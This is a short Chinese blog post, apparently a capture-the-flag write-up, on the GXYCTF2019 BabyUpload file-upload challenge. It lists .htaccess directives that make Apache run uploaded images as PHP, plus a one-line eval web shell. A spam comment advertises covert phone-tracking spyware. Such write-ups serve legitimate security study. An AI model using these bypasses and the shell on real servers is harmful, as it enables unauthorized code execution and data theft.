• 周五. 4月 26th, 2024

5G编程聚合网

5G时代下一个聚合的编程学习网

热门标签

web | [GXYCTF2019]BabyUpload

admin

11月 28, 2021

文件上传的题目,环境是php+apache
通过.htaccess绕过。

这里有几种方式:

# way1
AddType application/x-httpd-php .png
# way2
.htaccess
php_value auto_append_file .htaccess
#<?php phpinfo();
#way3
SetHandler application/x-httpd-php

然后上传phtml格式的木马:

<script language='php'>eval($_POST[mz]);</script>

查了一下phpinfo,没有ban很多函数。
直接scandir+file_get_contents带走。
over.

本文来自博客园,作者:Mz1,转载请注明原文链接:https://www.cnblogs.com/Mz1-rc/p/15089968.html

《web | [GXYCTF2019]BabyUpload》有一个想法
  1. Rastreador de celular – Aplicativo de rastreamento oculto que registra localização, SMS, áudio de chamadas, WhatsApp, Facebook, foto, câmera, atividade de internet. Melhor para controle dos pais e monitoramento de funcionários. Rastrear Telefone Celular Grátis – Programa de Monitoramento Online.

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注